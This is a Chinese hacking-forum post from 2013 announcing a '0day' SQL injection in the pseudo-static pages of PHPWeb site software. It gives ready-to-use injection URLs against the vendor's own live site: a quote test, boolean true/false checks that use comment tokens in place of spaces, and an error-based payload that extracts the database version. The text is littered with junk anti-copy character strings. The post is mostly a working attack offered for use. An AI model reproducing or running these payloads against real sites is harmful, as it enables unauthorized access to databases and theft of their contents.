找回密码
 立即注册
查看: 2777|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入8 X+ p* N; J- k3 P8 o+ |& h
; C' z0 h* {; i; m3 t* k/ b
主站:http://phpweb.net/
+ F( R& m- g. c3 F, @3 U& ?5 M加’检测:
, d0 L; ?3 r8 E' k8 h 4 ^, t' O2 I. ?6 n
http://www.phpweb.net/down/html/?772′.html
6 q3 K) L2 V0 O5 {( ]
* `8 Q+ m6 n) d3 g8 m/ Y! z出错
9 @3 k7 Z1 l: E8 c3 @/ I存在注入。2 s4 {7 P" x- G# P) N* D
不能用空格,只能用/*罗
8 b0 }% A& S9 `) i! s* U7 y* hhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常2 e* u/ y; q. Y! Z5 K* o
: u! H+ V& x# t3 x- p, ~
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
% j. o  z+ b$ X" E爆数据库版本:- d* I( V% B8 x

; g! ~* S4 s: b( j7 @  u+ W$ i?8 A( j1 O8 |" d1 d% K6 ^
14 s# C7 g% D0 o5 z
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
' c( q9 O- B, z# X$ |4 c更新日期: 2013-01-03 13:39:50        - j9 K2 k4 p3 S* X8 L1 H* r/ y5 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表